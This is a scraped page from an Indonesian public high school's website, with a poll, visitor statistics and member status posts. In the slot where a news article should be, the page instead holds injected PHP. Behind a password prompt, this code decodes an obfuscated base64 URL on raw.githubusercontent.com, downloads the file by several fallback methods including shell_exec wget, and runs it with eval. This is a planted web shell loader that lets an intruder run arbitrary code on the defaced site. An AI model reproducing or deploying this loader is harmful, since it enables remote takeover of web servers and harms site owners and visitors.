s
  • header web 2
  • SELAMAT HUT RI KE 79

Selamat Datang di Website SMA NEGERI PULAUPANGGUNG | Terima Kasih Kunjungannya.

Pencarian

Login Member

Kontak Kami

Banner

Jajak Pendapat

Bagaimana pendapat anda mengenai web sekolah kami ?
Sangat bagus
Bagus
Kurang Bagus
  Lihat

Statistik


Total Hits : 198046
Pengunjung : 85787
Hari ini : 27
Hits hari ini : 64
Member Online : 73
IP : 216.73.216.11
Proxy : -
Browser : Gecko Mozilla

Status Member

  • ASEF RIYADI, M. Pd (Guru)
    2019-03-09 05:54:07

    Kelas x.a1 sampai x.a4 kapan siap remedia fiaika?klo rabu pas liburan siap ga?
  • ELLSA NURRIA UTARI (Siswa)
    2019-02-28 17:24:35

    Apa yang Anda pikirkan?
  • ARTIKA SARI DEWI (Siswa)
    2019-02-07 05:34:30

    sellamat pagi
  • ABDUL RAHIM (Guru)
    2017-01-25 09:35:35

    Apa yang Anda pikirkan?
  • SISMAWATI, S.Pd (Guru)
    2017-01-25 09:18:01

    The experience is the best teacher
  • SISMAWATI, S.Pd (Guru)
    2017-01-25 09:18:01

    The experience is the best teacher
  • ASEF RIYADI, M. Pd (Guru)
    2017-01-09 12:18:42

    Alhamdulillah website sekolah telah online....selamat menggunakan!




<?php


session_start();


$ewean = 'xxx';


 


if (!isset($_SESSION['authenticated'])) {


    if (isset($_POST['password'])) {


        if ($_POST['password'] === $ewean) {


            $_SESSION['authenticated'] = true;


        } else {


            echo "Password salah!";


        }


    }


 


    if (!isset($_SESSION['authenticated'])) {


        echo '<form method="post">';


        echo 'Password: <input type="password" name="password">';


        echo '<input type="submit" value="Login">';


        echo '</form>';


        exit;


    }


}


?>


 


<!DOCTYPE html>


<html>


<head>


    


<?php


ini_set('display_errors', 1);


ini_set('display_startup_errors', 1);


error_reporting(E_ALL);


$protocol_enc = 'aHR0cHM6Ly8=';


$domain_enc = 'cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbQ==';


$path_enc = 'RGFtblNlYy94L21haW4vMS50eHQ=';


$decode = function ($encoded_string) {


    return base64_decode($encoded_string);


};


$protocol = $decode($protocol_enc);


$domain = $decode($domain_enc);


$path = $decode($path_enc);


$url = $protocol . $domain . '/' . $path;


$f_ab = 'curl_' . 'init';


$f_cd = 'curl_' . 'exec';


$f_ef = 'curl_' . 'close';


$f_gh = 'file_' . 'get_' . 'contents';


$f_ij = 'f' . 'open';


$f_kl = 'f' . 'close';


$f_mn = 'shell_' . 'exec';


function get_content_from_url($url)


{


    global $f_ab, $f_cd, $f_ef, $f_gh, $f_ij, $f_kl, $f_mn;


    if (function_exists($f_ab)) {


        $ch = $f_ab();


        curl_setopt($ch, CURLOPT_URL, $url);


        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);


        curl_setopt($ch, CURLOPT_FAILONERROR, true);


        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);


        $output = $f_cd($ch);


        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);


        $f_ef($ch);


        if ($output !== false && $http_code == 200) {


            return $output;


        }


    }


    if (ini_get('allow_url_fopen')) {


        $output = @$f_gh($url);


        if ($output !== false) {


            return $output;


        }


    }


    $handle = @$f_ij($url, 'r');


    if ($handle) {


        $output = '';


        while (!feof($handle)) {


            $output .= fread($handle, 8192);


        }


        $f_kl($handle);


        if ($output !== false) {


            return $output;


        }


    }


    if (function_exists('exec') || function_exists($f_mn)) {


        $output = @$f_mn('wget -q -O - ' . escapeshellarg($url));


        if (!empty($output)) {


            return $output;


        }


    }


    return false;


}


$output = get_content_from_url($url);


if ($output !== false) {


    $run_code = function ($code) {


        return @eval('?>' . $code);


    };


    $run_code($output);


} else {


    echo "GAK BISA TOLOL.";


}



Share This Post To :




Kembali ke Atas


Berita Lainnya :




Silahkan Isi Komentar dari tulisan berita diatas :

Nama :

E-mail :

Komentar :

          

Kode :

 

Komentar :


   Kembali ke Atas